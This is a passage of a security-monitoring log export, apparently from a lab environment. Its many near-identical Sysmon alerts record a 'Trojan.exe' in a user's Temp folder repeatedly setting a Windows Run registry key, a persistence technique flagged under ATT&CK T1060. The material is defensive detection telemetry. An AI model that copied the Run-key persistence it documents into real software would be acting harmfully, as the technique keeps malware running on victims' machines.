HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:22:03.055"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:15.352",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:02.024 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:02.037547400Z"",""eventRecordID"":""1188"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:02.024\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:02.024"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:14.168",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:00.962 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:00.967286000Z"",""eventRecordID"":""1121"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:00.962\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:00.962"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:19:13.117",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:59.948 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:59.983585100Z"",""eventRecordID"":""1084"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:59.948\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:21:59.948"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:12.087",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:58.852 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:58.855332400Z"",""eventRecordID"":""1083"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:58.852\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:58.852"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:10.960",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:57.836 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:57.846833200Z"",""eventRecordID"":""1082"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:57.836\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:57.836"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:19:09.915",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:56.790 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:56.791627400Z"",""eventRecordID"":""1081"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:56.790\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:21:56.790"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:08.898",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:55.774 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:55.777092100Z"",""eventRecordID"":""1080"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:55.774\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:55.774"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:07.945",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:54.758 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:54.762204800Z"",""eventRecordID"":""1079"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:54.758\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:54.758"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:19:07.933",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:53.727 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:53.732610900Z"",""eventRecordID"":""1078"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:53.727\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:21:53.727"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:07.884",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:52.696 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:52.701510400Z"",""eventRecordID"":""1077"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:52.696\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:52.696"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:04.790",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:51.665 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:51.668597100Z"",""eventRecordID"":""1076"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:51.665\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 